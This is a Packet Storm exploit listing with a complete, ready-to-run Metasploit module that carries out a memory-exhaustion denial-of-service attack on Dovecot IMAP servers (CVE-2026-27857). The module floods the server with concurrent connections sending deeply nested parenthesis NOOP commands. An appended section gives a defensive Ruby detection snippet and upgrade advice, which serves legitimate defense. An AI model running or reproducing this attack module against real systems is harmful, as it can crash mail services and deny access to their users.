## https://sploitus.com/exploit?id=PACKETSTORM:219556
==================================================================================================================================
    | # Title     : Dovecot IMAP NOOP Command Memory Exhaustion Denial of Service                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a memory exhaustion vulnerability in the Dovecot IMAP service.
                     It opens multiple concurrent TCP connections and sends specially crafted NOOP commands containing deeply nested parentheses to force excessive memory allocation on the server.
                     By sustaining these connections for a configurable duration, the module attempts to exhaust system memory, potentially leading to service instability or crash.
                     It is classified as a denial-of-service (DoS) attack affecting specific Dovecot versions.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Dos
      include Msf::Exploit::Remote::Tcp
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot IMAP NOOP Command Memory Exhaustion DoS',
            'Description' => %q{
              Dovecot imap-login service is vulnerable to memory exhaustion through specially
              crafted NOOP commands. Sending a NOOP command with 4000 nested parentheses
              causes ~1MB of memory allocation per connection. By opening multiple connections
              without sending the terminating LF, an attacker can cause memory exhaustion
              leading to service crash.
    
              An attacker can create 1000 connections to allocate 1GB of memory, triggering
              VSZ limit and killing the process along with its proxied connections.
    
              Affects Dovecot Pro core 2.3.0+, Dovecot Pro core 3.1.0+, Dovecot CE core 2.4.0+.
              Fixed in versions 2.4.3, 3.0.5, 3.1.4, and 2.3.22.1.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2026-27857'],
              ['URL', 'https://documentation.open-xchange.com/dovecot/security/advisories/html/2026/oxdc-adv-2026-0001.html'],
              ['CWE', '400']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(143),
          OptInt.new('THREADS', [true, 'Number of concurrent connections', 100]),
          OptInt.new('PARENTHESIS_DEPTH', [true, 'Number of nested parentheses', 4000]),
          OptInt.new('DURATION', [true, 'Duration of attack in seconds', 30])
        ])
      end
    
      def run
        print_status("Dovecot IMAP NOOP Memory Exhaustion DoS (CVE-2026-27857)")
        print_status("Target: #{peer}")
        
        threads = []
        start_time = Time.now
        
        print_status("Starting DoS attack with #{datastore['THREADS']} threads...")
        
        datastore['THREADS'].times do |i|
          threads << framework.threads.spawn("DovecotDoS-#{i}", false) do
            attack_connection
          end
        end
        
        while (Time.now - start_time) < datastore['DURATION']
          sleep(5)
          print_status("Attack ongoing... (#{(Time.now - start_time).round}/#{datastore['DURATION']}s)")
        end
        
        print_status("Stopping attack...")
        threads.each(&:kill)
        print_status("Attack completed")
      end
    
      def attack_connection
        sock = nil
    
        begin
          sock = connect
    
          banner = sock.get_once
          vprint_status("Connected, banner: #{banner}")
          parentheses = "(" * datastore['PARENTHESIS_DEPTH']
          parentheses += ")" * datastore['PARENTHESIS_DEPTH']
          sock.put("a1 NOOP #{parentheses}\r\n")
          sleep(datastore['DURATION'])
    
        rescue ::Exception => e
          vprint_error("Connection error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
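
For defenders, the traffic pattern described above can be recognised before login: a command line with very deep parenthesis nesting, either terminated (as the module sends it) or left without its LF (as the module's description states). The following is an added example, not part of the original module or of Dovecot; the thresholds, the `Finding` structure, the function names and the sample streams are assumptions constructed for illustration.

```ruby
# Added defensive example (not the module's code); thresholds are assumptions.
MAX_DEPTH = 32            # assumed ceiling for legitimate nesting
MAX_PENDING_BYTES = 2048  # assumed ceiling for bytes buffered without LF
Finding = Struct.new(:conn, :reason, :depth, :bytes)

# Deepest "(" nesting in one command line, ignoring quoted strings.
def max_paren_depth(line)
  depth = max = 0
  quoted = escaped = false
  line.each_char do |c|
    if quoted
      if escaped then escaped = false
      elsif c == '\\' then escaped = true
      elsif c == '"' then quoted = false
      end
    elsif c == '"' then quoted = true
    elsif c == '(' then max = [max, depth += 1].max
    elsif c == ')' && depth > 0 then depth -= 1
    end
  end
  max
end

# Inspect the client-to-server bytes seen so far on one connection.
def inspect_stream(conn, bytes)
  lines = bytes.split("\n", -1)
  pending = lines.pop || ''  # data after the last LF, still buffered
  findings = lines.map { |l| [l, max_paren_depth(l)] }
                  .select { |_, d| d > MAX_DEPTH }
                  .map { |l, d| Finding.new(conn, :deep_nesting, d, l.bytesize) }
  d = max_paren_depth(pending)
  bad = d > MAX_DEPTH || pending.bytesize > MAX_PENDING_BYTES
  findings << Finding.new(conn, :unterminated_oversized, d, pending.bytesize) if bad
  findings
end

# Source IPs with at least min_conns flagged connections.
def flagged_sources(streams, min_conns = 2)
  bad = streams.reject { |(ip, port), b| inspect_stream("#{ip}:#{port}", b).empty? }
  bad.keys.group_by(&:first).select { |_, v| v.size >= min_conns }.keys
end

# Constructed sample streams keyed by [ip, port] (documentation addresses).
NESTED = 'a1 NOOP ' + '(' * 100 + ')' * 100
SAMPLE = {
  ['192.0.2.10', 40001] => "a1 NOOP\r\na2 FETCH 1 (FLAGS BODY[HEADER.FIELDS (DATE FROM)])\r\n",
  ['198.51.100.7', 50001] => NESTED + "\r\n",
  ['198.51.100.7', 50002] => NESTED
}.freeze
```

IMAP literals (`{n}` followed by raw bytes) are not parsed here, so parentheses inside a literal are counted as nesting; treat the result as a triage signal and pair it with upgrading to the fixed versions the description lists.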